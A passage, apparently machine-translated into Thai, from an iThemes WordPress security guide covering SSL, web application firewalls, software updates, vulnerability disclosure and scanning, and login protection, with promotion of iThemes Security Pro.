หากเว็บไซต์ WordPress ของคุณไม่มี SSL สิ่งแรกที่คุณควรทำคือขอให้ผู้ให้บริการโฮสต์ของคุณตรวจสอบว่ามีใบรับรอง SSL และการกำหนดค่าฟรีหรือไม่ ในปี 2564 บริษัทโฮสติ้งส่วนใหญ่จะรวม SSL ไว้ในแพ็คเกจโฮสติ้ง ตัวอย่างเช่น iThemes Hosting ให้บริการและจัดการ SSL สำหรับทุกเว็บไซต์

หากโฮสต์ของคุณไม่มีใบรับรอง SSL ฟรี ไม่ต้องกังวล ยังมีตัวเลือกอื่นๆ อีกมากมาย

Cloudflare เสนอใบรับรอง SSL ที่ใช้ร่วมกันฟรีสำหรับเว็บไซต์ WordPress หากคุณไม่ต้องการมีใบรับรอง SSL ที่ใช้ร่วมกันและพอใจกับบรรทัดคำสั่ง CertBot เป็นตัวเลือกที่ยอดเยี่ยม Certbot ไม่เพียงแต่สร้างใบรับรอง SSL ฟรีโดยใช้ Let's Encrypt สำหรับคุณเท่านั้น แต่ยังจัดการการต่ออายุใบรับรองให้คุณโดยอัตโนมัติอีกด้วย

การเปิดใช้งาน SSL บนเว็บไซต์ WordPress ของคุณเป็นสิ่งจำเป็นในปี 2021 SSL ช่วยรักษาความปลอดภัยในการสื่อสารระหว่างคุณกับลูกค้า ปรับปรุง SEO ของคุณ และช่วยให้ผู้เยี่ยมชมเว็บไซต์ของคุณรู้สึกสบายใจว่าพวกเขาจะปลอดภัยขณะเรียกดูเว็บไซต์ของคุณ

ใช้ไฟร์วอลล์แอปพลิเคชันเว็บ

การใช้ไฟร์วอลล์ของเว็บแอปพลิเคชันเป็นวิธีที่ยอดเยี่ยมในการเพิ่มการป้องกันอีกชั้นหนึ่งให้กับเว็บไซต์ WordPress ของคุณ

Web Application Firewall คืออะไร?

WAF หรือ Web Application Firewall ช่วยรักษาความปลอดภัยให้กับเว็บไซต์ของคุณโดยการตรวจสอบปริมาณการใช้อินเทอร์เน็ตที่มุ่งหน้าไปยังเว็บไซต์ของคุณก่อนที่จะเข้าสู่เว็บไซต์ของคุณ

การเพิ่ม WAF หน้า WordPress แสดงว่าคุณกำลังเพิ่มจุดตรวจความปลอดภัยระหว่างอินเทอร์เน็ตและเว็บไซต์ของคุณ ก่อนที่การเข้าชมจะสามารถเข้าถึงเว็บไซต์ของคุณได้ จะต้องผ่าน WAF

หาก WAF ตรวจพบทราฟฟิกที่เป็นอันตราย เช่น CSRF, XSS, SQL Injections และอื่นๆ ระบบจะกรองข้อมูลออกก่อนที่จะเข้าสู่เว็บไซต์ของคุณ ไม่เพียงเท่านั้น แต่ WAF สามารถช่วยตรวจจับการโจมตี DDoS และใช้การจำกัดอัตราเพื่อป้องกันไม่ให้เว็บไซต์ของคุณหยุดทำงาน

3 วิธีในการดำเนินการ WAF

คุณสามารถใช้ WAF ได้ 3 วิธี มาดูข้อดีข้อเสียของแต่ละประเภทกัน

1. WAF แบบเครือข่าย – WAF แบบใช้เครือข่ายหรือแบบกายภาพเป็นแบบฮาร์ดแวร์ ข้อดีหลักของ WAF บนเครือข่ายคือความหน่วงแฝงต่ำที่มาจากการติดตั้งในเครื่อง อย่างไรก็ตามข้อเสียมาจากราคาของการจัดเก็บและบำรุงรักษาอุปกรณ์ทางกายภาพ ข้อกำหนดด้านราคาและการจัดเก็บจริงทำให้ตัวเลือกนี้เป็นทางเลือกที่ไม่ดีสำหรับคนส่วนใหญ่
2. WAF แบบโฮสต์ – WAF แบบโฮสต์หรือแบบโลคัลถูกรวมเข้ากับ WordPress โดยทั่วไปจะใช้ปลั๊กอิน ข้อดีของ WAF แบบโฮสต์คือมีราคาถูกกว่า WAF บนเครือข่าย ข้อเสียของ WAF ในเครื่องคือข้อกำหนดของทรัพยากรเซิร์ฟเวอร์ของคุณ และด้วยการกรองการเข้าชมที่เกิดขึ้นบนเว็บไซต์ของคุณ อาจส่งผลให้เวลาในการโหลดหน้าเว็บช้าลงสำหรับผู้เยี่ยมชมเว็บไซต์ของคุณ
3. WAF บน คลาวด์ – โดยทั่วไปแล้ว WAF บนคลาวด์จะเป็นตัวเลือกที่ดีที่สุดสำหรับคนส่วนใหญ่ ข้อดีของ WAF บนคลาวด์คือมีราคาไม่แพง คุณไม่จำเป็นต้องจัดการ นอกจากนี้ ด้วยการกรองการรับส่งข้อมูลก่อนที่จะเข้าสู่เว็บไซต์ของคุณ จะไม่ดูดทรัพยากรเซิร์ฟเวอร์ของคุณและทำให้เว็บไซต์ของคุณช้าลง Cloudflare และ Sucuri เป็นผู้ให้บริการไฟร์วอลล์บนคลาวด์ยอดนิยม

ห่อ

ในส่วนนี้ เราได้เรียนรู้ว่าเหตุใดการเลือกโฮสต์ที่เหมาะสมจึงมีความสำคัญ วิธีรักษาความปลอดภัยในการสื่อสารระหว่างเว็บไซต์ของเราและผู้เยี่ยมชม และวิธีที่ WAF สามารถช่วยป้องกันทราฟฟิกที่เป็นอันตรายไม่ให้เข้าชมเว็บไซต์ของเรา

ในส่วนถัดไป คุณจะได้เรียนรู้วิธีปฏิบัติที่ดีที่สุดในการรักษาซอฟต์แวร์ WordPress ของคุณให้ปลอดภัย

ส่วนที่ 5: ความปลอดภัยของซอฟต์แวร์ WordPress

ทุกครั้งที่คุณติดตั้งปลั๊กอินหรือธีมใหม่ คุณแนะนำโค้ดใหม่ที่อาจถูกแฮ็กเกอร์ใช้โจมตีได้ ในส่วนนี้ คุณจะได้เรียนรู้สิ่งที่ควรทำและไม่ควรทำในการจัดการ WordPress, ปลั๊กอิน และธีม

1. ติดตั้งซอฟต์แวร์จากแหล่งที่เชื่อถือได้เท่านั้น

ติดตั้งเฉพาะปลั๊กอินและธีมของ WordPress จากแหล่งที่เชื่อถือได้เท่านั้น คุณควรติดตั้งเฉพาะซอฟต์แวร์ที่คุณได้รับจาก WordPress.org ที่เก็บข้อมูลเชิงพาณิชย์ที่รู้จักกันดี หรือโดยตรงจากนักพัฒนาที่มีชื่อเสียง คุณจะต้องหลีกเลี่ยงปลั๊กอินเชิงพาณิชย์รุ่น "null" เนื่องจากอาจมีโค้ดที่เป็นอันตราย ไม่สำคัญหรอกว่าคุณจะล็อคเว็บไซต์ WordPress ของคุณอย่างไร หากคุณเป็นคนติดตั้งมัลแวร์

หากปลั๊กอินหรือธีมของ WordPress ไม่ได้เผยแพร่บนเว็บไซต์ของนักพัฒนาซอฟต์แวร์ คุณจะต้องตรวจสอบวิเคราะห์สถานะก่อนดาวน์โหลดปลั๊กอิน ติดต่อนักพัฒนาซอฟต์แวร์เพื่อดูว่ามีความเกี่ยวข้องกับเว็บไซต์ที่เสนอผลิตภัณฑ์ของตนในราคาฟรีหรือลดราคาในทางใดๆ หรือไม่

2. ลบปลั๊กอินและธีมที่ไม่ได้ใช้

การมีปลั๊กอินและธีมที่ไม่ได้ใช้หรือไม่ได้ใช้งานอยู่ในเว็บไซต์ของคุณถือเป็นข้อผิดพลาดด้านความปลอดภัยที่สำคัญของ WordPress โค้ดทุกชิ้นบนเว็บไซต์ของคุณเป็นจุดเริ่มต้นสำหรับแฮ็กเกอร์

เป็นเรื่องปกติสำหรับนักพัฒนาที่จะใช้ไลบรารี JS เช่นโค้ดของบุคคลที่สามในปลั๊กอินและธีม ขออภัย หากห้องสมุดไม่ได้รับการดูแลอย่างเหมาะสม ห้องสมุดสามารถสร้างช่องโหว่ที่ผู้โจมตีสามารถใช้เพื่อแฮ็กเว็บไซต์ของคุณได้

หมายเหตุ: ใช้การตรวจสอบไซต์ iThemes Sync Pro เพื่อตรวจสอบหน้าเว็บของคุณสำหรับไลบรารี JavaScript ส่วนหน้าที่มีช่องโหว่ด้านความปลอดภัยที่ทราบ

ถอนการติดตั้งและลบปลั๊กอินและธีมที่ไม่จำเป็นออกจากไซต์ WordPress ของคุณโดยสมบูรณ์ เพื่อจำกัดจำนวนจุดเข้าใช้งานและโค้ดสั่งการบนเว็บไซต์ของคุณ

3. ทำให้ซอฟต์แวร์ WordPress ของคุณทันสมัยอยู่เสมอ

การอัปเดตซอฟต์แวร์ให้ทันสมัยอยู่เสมอเป็นส่วนสำคัญของกลยุทธ์ด้านความปลอดภัยของ WordPress การอัปเดตไม่ได้มีไว้สำหรับการแก้ไขข้อบกพร่องและคุณลักษณะใหม่เท่านั้น การอัปเดตยังรวมถึงแพตช์ความปลอดภัยที่สำคัญอีกด้วย หากไม่มีโปรแกรมแก้ไขดังกล่าว คุณจะปล่อยให้โทรศัพท์ คอมพิวเตอร์ เซิร์ฟเวอร์ เราเตอร์ หรือเว็บไซต์เสี่ยงต่อการถูกโจมตี

การมีปลั๊กอินหรือธีมที่มีช่องโหว่ซึ่งมีแพตช์ให้บริการแต่ไม่ได้ใช้ถือเป็นสาเหตุอันดับหนึ่งของเว็บไซต์ WordPress ที่ถูกแฮ็ก ซึ่งหมายความว่าช่องโหว่ส่วนใหญ่จะถูกโจมตี หลังจากที่ มีการเปิดตัวโปรแกรมแก้ไขสำหรับช่องโหว่

การละเมิด Equifax ที่มีการรายงานสูงสามารถป้องกันได้หากพวกเขาอัปเดตซอฟต์แวร์ สำหรับการละเมิด Equifax ไม่มีข้อแก้ตัว

บางสิ่งที่ง่ายพอๆ กับการอัปเดตซอฟต์แวร์สามารถปกป้องคุณได้ ดังนั้นอย่าเพิกเฉยต่อการอัปเดต WordPress เหล่านั้น การอัปเดต เป็นหนึ่งในองค์ประกอบพื้นฐานที่สุดของการรักษาความปลอดภัยของ WordPress และการรักษาความปลอดภัยเว็บทั้งหมด

แพทช์วันอังคาร

Patch Tuesday เป็นคำที่ไม่เป็นทางการซึ่งอ้างถึงการแก้ไขจุดบกพร่องและความปลอดภัยทั่วไปที่ Microsoft เผยแพร่ในวันอังคารที่สองของทุกเดือน เป็นเรื่องที่ยอดเยี่ยมที่ Microsoft เผยแพร่การแก้ไขด้านความปลอดภัยในจังหวะที่น่าเชื่อถือดังกล่าว Patch Tuesday เป็นวันที่ช่องโหว่ด้านความปลอดภัยที่โปรแกรมแก้ไขของ Microsoft ถูกเปิดเผยต่อสาธารณะ

ตรวจสอบส่วนสิ่งที่ต้องอัปเดต & วิธีทำให้การอัปเดตของคุณเป็นแบบอัตโนมัติใน The Ultimate Guide to WordPress Security ในปี 2020 ebook เพื่อเรียนรู้วิธีใช้การอัปเดต Patch Tuesday โดยอัตโนมัติ

ใช้ประโยชน์จากวันพุธ

ในวันพุธถัดจาก Patch Tuesday เป็นเรื่องปกติที่จะเห็นผู้โจมตีจำนวนมากใช้ประโยชน์จากช่องโหว่ที่รู้จักก่อนหน้านี้ในระบบที่ล้าสมัยและไม่ได้แก้ไข ดังนั้น วันพุธหลังจาก Patch Tuesday ได้รับการประกาศเกียรติคุณอย่างไม่เป็นทางการเป็น Exploit Wednesday

เหตุใดแฮกเกอร์จึงกำหนดเป้าหมายช่องโหว่ที่ได้รับการแก้ไข

แฮ็กเกอร์กำหนดเป้าหมายช่องโหว่ที่ได้รับการแก้ไขแล้ว เนื่องจากพวกเขารู้ว่าผู้คนไม่ได้อัปเดต (รวมถึงปลั๊กอินและธีมบนเว็บไซต์ของคุณ) เป็นมาตรฐานอุตสาหกรรมในการเปิดเผยช่องโหว่ต่อสาธารณะในวันที่ได้รับการแก้ไข หลังจากที่ช่องโหว่ถูกเปิดเผยต่อสาธารณะ ช่องโหว่ดังกล่าวจะกลายเป็น “ช่องโหว่ที่รู้จัก” สำหรับซอฟต์แวร์เวอร์ชันที่ล้าสมัยและไม่ได้แพตช์ ซอฟต์แวร์ที่มีช่องโหว่ที่รู้จักเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์

แฮ็กเกอร์ชอบเป้าหมายที่ง่าย และการมีซอฟต์แวร์ที่มีช่องโหว่ที่ทราบก็เหมือนกับการให้คำแนะนำทีละขั้นตอนแก่แฮ็กเกอร์เพื่อเจาะเข้าไปในเว็บไซต์ WordPress เซิร์ฟเวอร์ คอมพิวเตอร์ หรืออุปกรณ์ที่เชื่อมต่ออินเทอร์เน็ตอื่นๆ

การเปิดเผยข้อมูลอย่างมีความรับผิดชอบ

คุณอาจสงสัยว่าเหตุใดช่องโหว่จึงถูกเปิดเผยหากช่องโหว่นั้นทำให้แฮ็กเกอร์สามารถโจมตีได้ เป็นเรื่องปกติมากที่นักวิจัยด้านความปลอดภัยจะค้นหาและรายงานช่องโหว่ไปยังผู้พัฒนาซอฟต์แวร์เป็นการส่วนตัว

ด้วยการเปิดเผยอย่างมีความรับผิดชอบ รายงานเบื้องต้นของผู้วิจัยจะจัดทำขึ้นเป็นการส่วนตัวต่อผู้พัฒนาของบริษัทที่เป็นเจ้าของซอฟต์แวร์ แต่ด้วยข้อตกลงว่ารายละเอียดทั้งหมดจะถูกเผยแพร่เมื่อมีการเผยแพร่แพตช์แล้ว สำหรับช่องโหว่ด้านความปลอดภัยที่สำคัญ อาจมีความล่าช้าเล็กน้อยในการเปิดเผยช่องโหว่เพื่อให้ผู้คนมีเวลามากขึ้นในการแก้ไข

นักวิจัยด้านความปลอดภัยอาจกำหนดเส้นตายให้ผู้พัฒนาซอฟต์แวร์ตอบกลับรายงานหรือจัดเตรียมโปรแกรมแก้ไข หากไม่เป็นไปตามกำหนดเวลา ผู้วิจัยอาจเปิดเผยช่องโหว่ต่อสาธารณะเพื่อกดดันผู้พัฒนาให้ออกโปรแกรมแก้ไข

การเปิดเผยช่องโหว่ในที่สาธารณะและดูเหมือนว่าจะแนะนำ Zero Day ซึ่งเป็นช่องโหว่ประเภทหนึ่งที่ไม่มีโปรแกรมแก้ไขและกำลังถูกเอารัดเอาเปรียบในป่า อาจดูเหมือนเป็นการต่อต้าน แต่เป็นการใช้ประโยชน์เพียงอย่างเดียวที่นักวิจัยต้องกดดันนักพัฒนาให้แก้ไขช่องโหว่

หากแฮ็กเกอร์ค้นพบช่องโหว่ พวกเขาสามารถใช้ Exploit อย่างเงียบ ๆ และสร้างความเสียหายให้กับผู้ใช้ปลายทาง (นี่คือคุณ) ในขณะที่ผู้พัฒนาซอฟต์แวร์ยังคงเนื้อหาเกี่ยวกับการไม่แก้ไขช่องโหว่ดังกล่าว

Project Zero ของ Google มีแนวทางที่คล้ายกันในการเปิดเผยช่องโหว่ พวกเขาเผยแพร่รายละเอียดทั้งหมดของช่องโหว่หลังจาก 90 วันว่าช่องโหว่นั้นได้รับการแก้ไขหรือไม่

การเรียนรู้ที่จะอัปเดต: The Hard Way

ณ สิ้นปี 2018 แฮกเกอร์ใช้ประโยชน์จากช่องโหว่ในปลั๊กอิน WP GDPR Compliance Exploit อนุญาตให้ผู้ใช้ที่ไม่ได้รับอนุญาต—ผู้ที่ไม่ได้ลงชื่อเข้าใช้เว็บไซต์—แก้ไขการตั้งค่าการลงทะเบียนผู้ใช้ WP และเปลี่ยนบทบาทผู้ใช้เริ่มต้นใหม่จากสมาชิกเป็นผู้ดูแลระบบ โชคดีที่ผู้พัฒนาปลั๊กอินการปฏิบัติตามข้อกำหนด WP GDPR ดำเนินการอย่างรวดเร็วและออกแพตช์สำหรับช่องโหว่ในวันรุ่งขึ้นหลังจากที่เปิดเผยต่อสาธารณะ

แต่เช่นเดียวกับ Exploit Wednesday แฮ็กเกอร์ตั้งเป้าไปที่ช่องโหว่แม้ว่าจะมีการเปิดตัวแพตช์แล้ว ในวันและสัปดาห์หลังจากผู้เปิดเผยช่องโหว่ในการปฏิบัติตามข้อกำหนด WP GDPR เราได้รับรายงานจำนวนมากว่าเว็บไซต์ WordPress ถูกแฮ็กโดยผู้โจมตีที่ใช้ประโยชน์จากช่องโหว่

การมีปลั๊กอินหรือธีมที่มีช่องโหว่ซึ่งมีแพตช์ให้บริการแต่ไม่ได้ใช้ถือเป็นสาเหตุอันดับหนึ่งของเว็บไซต์ WordPress ที่ถูกแฮ็ก นี่มันน่าหงุดหงิดชะมัด !!!!! ซึ่งหมายความว่าสามารถป้องกันการแฮ็ก WP ส่วนใหญ่ได้

เป็นเรื่องที่น่าหงุดหงิดที่ต้องคิดถึงทุกคนที่ใช้เงินจำนวนมากในการทำความสะอาดเว็บไซต์ รายได้ที่พวกเขาสูญเสียไปในขณะที่เว็บไซต์ล่ม และรายได้ในอนาคตที่พวกเขาสูญเสียไปกับการสูญเสียความไว้วางใจจากลูกค้า มันทำให้อารมณ์เสียมากขึ้นเมื่อคุณรู้ว่าความเจ็บปวดทั้งหมดนั้นสามารถป้องกันได้ด้วยการอัปเดตง่ายๆ

คุณลักษณะการจัดการเวอร์ชัน iThemes Security Pro ทำให้ปรับแต่งและทำให้การอัปเดต WordPress ของคุณเป็นไปโดยอัตโนมัติ

4. ติดตามช่องโหว่ของ WordPress

การอัปเดตปลั๊กอินและธีมของคุณอยู่เสมอไม่ได้ป้องกันคุณจากทุกช่องโหว่ของ WordPress ปลั๊กอินและธีมของ WordPress บางตัวถูกละทิ้งโดยนักพัฒนาที่สร้างมันขึ้นมา

น่าเสียดาย หากปลั๊กอินหรือธีมที่ถูกละทิ้งมีช่องโหว่ มันจะไม่มีวันได้รับแพตช์ แฮกเกอร์จะกำหนดเป้าหมายเว็บไซต์ที่ใช้ปลั๊กอินที่มีช่องโหว่เหล่านี้อย่างถาวร

หากคุณมีปลั๊กอินที่ถูกละทิ้งซึ่งมีช่องโหว่ที่ทราบบนเว็บไซต์ของคุณ แสดงว่าคุณกำลังให้พิมพ์เขียวที่จำเป็นสำหรับแฮ็กเกอร์เพื่อเข้าครอบครองเว็บไซต์ของคุณ นั่นคือเหตุผลที่คุณต้องติดตามช่องโหว่ล่าสุดทั้งหมด

เป็นการยากที่จะติดตามทุกช่องโหว่ของ WordPress ที่เปิดเผย และเปรียบเทียบรายการนั้นกับเวอร์ชันของปลั๊กอินและธีมที่คุณติดตั้งบนเว็บไซต์ของคุณ การติดตามช่องโหว่คือความแตกต่างระหว่างการมีเว็บไซต์ที่ปลอดภัยกับเว็บไซต์ที่แฮ็กเกอร์สามารถใช้ประโยชน์ได้ง่าย

ข่าวดีสำหรับคุณ! เราติดตามและแบ่งปันทุกช่องโหว่ที่เปิดเผยใน WordPress Vulnerability Roundups ของเรา

5. สแกนเว็บไซต์ของคุณเพื่อหาช่องโหว่

วิธีที่เร็วกว่าคือการปกป้องเว็บไซต์ของคุณจากการใช้ประโยชน์จากแฮ็กเกอร์อย่างง่าย ๆ คือการใช้การสแกนอัตโนมัติเพื่อตรวจสอบเว็บไซต์ของคุณเพื่อหาช่องโหว่ที่ทราบ

iThemes Security Pro Site Scanner เป็นวิธีของคุณในการป้องกันช่องโหว่โดยอัตโนมัติบนเว็บไซต์ WordPress ทั้งหมดของคุณ Site Scanner จะตรวจสอบไซต์ของคุณเพื่อหาช่องโหว่ที่ทราบ และจะใช้โปรแกรมแก้ไขโดยอัตโนมัติหากมี

ไซต์ iThemes Security Pro ตรวจสอบช่องโหว่ 3 ประเภท

1. ช่องโหว่ของ WordPress
2. ช่องโหว่ของปลั๊กอิน
3. ช่องโหว่ของธีม

คุณลักษณะการตรวจสอบไซต์ iThemes Sync Pro ใช้ประโยชน์จากพลังของ Google Lighthouse เพื่อปกป้องเว็บไซต์ของคุณ การตรวจสอบไซต์จะตรวจสอบและตั้งค่าสถานะหน้าที่มีไลบรารี JavaScript ส่วนหน้าที่มีช่องโหว่ด้านความปลอดภัยที่ทราบ

เป็นเรื่องปกติสำหรับนักพัฒนาที่จะใช้ไลบรารี JS เช่นโค้ดของบุคคลที่สามในปลั๊กอินและธีม ขออภัย หากห้องสมุดไม่ได้รับการดูแลอย่างเหมาะสม ห้องสมุดสามารถสร้างช่องโหว่ที่ผู้โจมตีสามารถใช้เพื่อแฮ็กเว็บไซต์ของคุณได้ การใช้ส่วนประกอบที่มีช่องโหว่ที่ทราบนั้นอยู่ในรายการ 10 อันดับแรกของ OWASP

การตรวจสอบเว็บไซต์ช่วยเบคอนของฉันไว้! ฉันสร้างตารางการตรวจสอบเพื่อให้ Sync Pro ทำการตรวจสอบอัตโนมัติทุกสัปดาห์ และส่งอีเมลรายงานการตรวจสอบให้ฉัน ฉันคอยอัปเดต ทุกอย่างอยู่ เสมอ และนั่นเป็นสาเหตุที่ทำให้ฉันตกใจเมื่อเห็นการตรวจสอบเว็บไซต์ของฉันว่าฉันใช้ไลบรารี JavaScript ที่มีช่องโหว่ด้านความปลอดภัยที่เป็นที่รู้จัก

รายงานชี้ให้ฉันดู jQuery เวอร์ชันเก่าในไดเร็กทอรี WordPress ของเว็บไซต์ซึ่งเต็มไปด้วยช่องโหว่ที่ทราบกันดีอยู่แล้ว! โชคดีสำหรับฉัน ฉันเห็นในการตรวจสอบไซต์ Sync Pro ว่าฉันใช้ไลบรารี JavaScript ที่มีช่องโหว่ด้านความปลอดภัยที่เป็นที่รู้จัก และสามารถแก้ไขปัญหานี้ได้ก่อนที่เว็บไซต์ของฉันจะถูกแฮ็ก

ห่อ

การจัดการซอฟต์แวร์ที่ทำให้เว็บไซต์ของคุณทำงานอย่างเหมาะสม ซึ่งรวมถึงปลั๊กอิน WordPress ธีม และแกนหลักของ WordPress จะช่วยเพิ่มประสิทธิภาพในกลยุทธ์การรักษาความปลอดภัย WordPress ของคุณ ทำให้เว็บไซต์ของคุณปลอดภัยจากผู้โจมตีทางออนไลน์

ส่วนที่ 6: การรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณ

URL ล็อกอินของ WordPress จะเหมือนกันทุกไซต์ WordPress และไม่ต้องมีการอนุญาตพิเศษใดๆ ในการเข้าถึง ใครก็ตามที่มีประสบการณ์ในการทำงานกับ WordPress จะรู้ดีว่า URL ล็อกอินนั้นอยู่ที่หน้า /wp-login.php

ความสามารถในการเข้าใช้งานของหน้าเข้าสู่ระบบ WordPress ทำให้เป็นส่วนที่ถูกโจมตีมากที่สุด และอาจเป็นส่วนที่เปราะบางที่สุดของเว็บไซต์ WordPress ใดๆ โชคดีสำหรับเรา ปลั๊กอิน iThemes Security Pro ทำให้ง่ายต่อการรักษาความปลอดภัยในการเข้าสู่ระบบ WordPress ของคุณ

มาดูเครื่องมือใน iThemes Security Pro ที่คุณสามารถใช้รักษาความปลอดภัยการเข้าสู่ระบบ WordPress และทำให้เข้าถึงไม่ได้!

1. จำกัดความพยายามในการเข้าสู่ระบบ

ขั้นตอนแรกในการรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณคือการ จำกัด การพยายามเข้าสู่ระบบที่ล้มเหลว ตามค่าเริ่มต้น ไม่มีอะไรใน WordPress ที่จะจำกัดจำนวนครั้งที่พยายามเข้าสู่ระบบที่ล้มเหลว โดยไม่จำกัดจำนวนครั้งในการพยายามเข้าสู่ระบบที่ล้มเหลวที่ผู้โจมตีสามารถทำได้ พวกเขาสามารถลองใช้ชื่อผู้ใช้และรหัสผ่านต่างๆ ร่วมกันได้จนกว่าจะพบชื่อผู้ใช้และรหัสผ่านที่ใช้งานได้

คุณสมบัติ iThemes Security Pro Local Brute Force Protection ช่วยติดตามการพยายามเข้าสู่ระบบที่ไม่ถูกต้องโดยโฮสต์หรือที่อยู่ IP และชื่อผู้ใช้ เมื่อ IP หรือชื่อผู้ใช้พยายามเข้าสู่ระบบที่ไม่ถูกต้องติดต่อกันหลายครั้งเกินไป พวกเขาจะถูกล็อคและจะป้องกันไม่ให้พยายามอีกในช่วงระยะเวลาหนึ่ง

ในการเริ่มต้นใช้งานฟีเจอร์ Local Brute Force Protection ให้เปิดใช้งานในหน้าหลักของหน้าการตั้งค่า iThemes Security Pro

การ ตั้งค่า Local Brute Force Protection ช่วยให้คุณสามารถกำหนดเกณฑ์สำหรับการล็อกได้

• ความพยายามในการเข้าสู่ระบบสูงสุดต่อโฮสต์ – จำนวนการพยายามเข้าสู่ระบบที่ไม่ถูกต้องซึ่ง IP ได้รับอนุญาตก่อนที่จะถูกล็อค
• ความพยายามในการเข้าสู่ระบบสูงสุดต่อผู้ใช้ - นี่คือจำนวนครั้งของการพยายามเข้าสู่ระบบที่ไม่ถูกต้องซึ่งชื่อผู้ใช้ได้รับอนุญาตก่อนที่จะถูกล็อค
• นาทีที่ต้องจำการเข้าสู่ระบบ ที่ไม่ถูกต้อง – นี่คือระยะเวลาที่ความพยายามเข้าสู่ระบบที่ไม่ถูกต้องควรนับรวมกับ IP หรือชื่อผู้ใช้สำหรับการล็อก
• แบนผู้ใช้ "ผู้ดูแลระบบ" โดยอัตโนมัติ - เมื่อเปิดใช้งาน ทุกคนที่ใช้ชื่อผู้ใช้ของผู้ดูแลระบบเมื่อเข้าสู่ระบบจะได้รับการล็อกอัตโนมัติ

มีสองสิ่งที่คุณต้องจำไว้เมื่อคุณกำหนดการตั้งค่าการล็อก คุณต้องการให้ผู้ใช้พยายามเข้าสู่ระบบที่ไม่ถูกต้องมากกว่าที่คุณให้ IP สมมติว่าเว็บไซต์ของคุณอยู่ภายใต้การโจมตีแบบเดรัจฉานและผู้โจมตีโดยใช้ชื่อผู้ใช้ของคุณ เป้าหมายคือการล็อค IP ของผู้โจมตี ไม่ใช่ชื่อผู้ใช้ของคุณ ดังนั้นคุณจึงยังสามารถเข้าสู่ระบบและทำงานให้เสร็จได้ แม้ว่าเว็บไซต์ของคุณจะถูกโจมตี

นอกจากนี้ คุณไม่ต้องการให้การตั้งค่าเหล่านี้เข้มงวดเกินไปโดยการตั้งค่าจำนวนครั้งในการพยายามเข้าสู่ระบบที่ไม่ถูกต้องให้ต่ำเกินไป และให้เวลาในการจดจำความพยายามที่ไม่ถูกต้องนานเกินไป หากคุณลดจำนวนครั้งในการพยายามเข้าสู่ระบบที่ไม่ถูกต้องสำหรับโฮสต์/IP เหลือ 1 ครั้ง และตั้งค่านาทีให้จดจำการพยายามเข้าสู่ระบบที่ไม่ถูกต้องเป็นเดือน แสดงว่าคุณกำลังเพิ่มโอกาสอย่างมากที่จะล็อกผู้ใช้ที่ถูกกฎหมายโดยไม่ได้ตั้งใจ

2. จำกัด การพยายามตรวจสอบสิทธิ์ภายนอกต่อคำขอ

มีวิธีอื่นในการเข้าสู่ระบบ WordPress นอกเหนือจากการใช้แบบฟอร์มการเข้าสู่ระบบ การใช้ XML-RPC ผู้โจมตีสามารถสร้างชื่อผู้ใช้และรหัสผ่านได้หลายร้อยครั้งในคำขอ HTTP เดียว วิธีการขยายกำลังเดรัจฉานช่วยให้ผู้โจมตีสามารถพยายามชื่อผู้ใช้และรหัสผ่านได้หลายพันครั้งโดยใช้ XML-RPC ในคำขอ HTTP เพียงไม่กี่ครั้ง

เมื่อใช้การตั้งค่า WordPress Tweaks ของ iThemes Security Pro คุณสามารถบล็อกการพยายามตรวจสอบสิทธิ์ได้หลายครั้งต่อคำขอ XML-RPC การจำกัดจำนวนชื่อผู้ใช้และรหัสผ่านสำหรับคำขอแต่ละครั้งจะช่วยรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณได้อย่างมาก

3. การป้องกันเครือข่ายเดรัจฉาน

การจำกัดความพยายามในการเข้าสู่ระบบนั้นเกี่ยวกับการป้องกันกำลังเดรัจฉานในท้องถิ่น การป้องกันกำลังเดรัจฉานในพื้นที่จะพิจารณาเฉพาะความพยายามในการเข้าถึงไซต์ของคุณและแบนผู้ใช้ตามกฎการล็อกที่ระบุไว้ในการตั้งค่าความปลอดภัยของคุณ

การป้องกัน Network Brute Force ก้าวไปอีกขั้น เครือข่าย เป็นชุมชน iThemes Security และมีเว็บไซต์กว่าล้านแห่งที่แข็งแกร่ง หากมีการระบุ IP ว่าพยายามเจาะเข้าไปในเว็บไซต์ในชุมชน iThemes Security IP นั้นจะถูกเพิ่มในรายการที่ถูกแบนของ Network Bruce Force

เมื่อ IP อยู่ในรายการต้องห้ามของ Network Brute Force แล้ว IP จะถูกบล็อกในทุกเว็บไซต์ในเครือข่าย ดังนั้น หาก IP โจมตีเว็บไซต์ของฉันและถูกแบน มันจะถูกรายงานไปยัง iThemes Security Brute Force Network รายงานของฉันสามารถช่วยให้ IP ถูกแบนในเครือข่ายทั้งหมดได้ ฉันชอบที่สามารถช่วยรักษาความปลอดภัยในการเข้าสู่ระบบ WordPress ของผู้อื่นได้ เพียงแค่เปิดใช้งาน iThemes Security Network Protection

หากต้องการเริ่มใช้ Network Force Protection ให้เปิดใช้งานในหน้าหลักของการตั้งค่าความปลอดภัย

จากนั้นป้อนที่อยู่อีเมลของคุณ เลือกว่าคุณต้องการรับการอัปเดตทางอีเมลหรือไม่ จากนั้นคลิกปุ่ม บันทึก

4. จำกัดการเข้าถึงอุปกรณ์ไปยังแดชบอร์ด WP

ขั้นตอนสุดท้ายในการรักษาความปลอดภัยการเข้าสู่ระบบ WordPress ของคุณคือการจำกัดการเข้าถึงแดชบอร์ด WordPress ของคุณไว้ที่ชุดอุปกรณ์ ฟีเจอร์ iThemes Security Pro Trusted Devices ระบุอุปกรณ์ที่คุณและผู้ใช้รายอื่นใช้เพื่อลงชื่อเข้าใช้ไซต์ WordPress ของคุณ เมื่อผู้ใช้เข้าสู่ระบบในอุปกรณ์ที่ไม่รู้จัก อุปกรณ์ที่เชื่อถือได้สามารถจำกัดความสามารถระดับผู้ดูแลระบบได้ ซึ่งหมายความว่าแฮ็กเกอร์สามารถเลี่ยงวิธีการรักษาความปลอดภัยการเข้าสู่ระบบอื่นๆ ของคุณได้ ซึ่งไม่น่าจะเป็นไปได้มากนัก พวกเขาจะไม่สามารถทำการเปลี่ยนแปลงที่เป็นอันตรายใดๆ กับเว็บไซต์ของคุณได้

หากต้องการเริ่มใช้ อุปกรณ์ที่เชื่อถือได้ ให้เปิดใช้งานบนหน้าหลักของการตั้งค่าความปลอดภัย จากนั้นคลิกปุ่ม กำหนดค่าการตั้งค่า

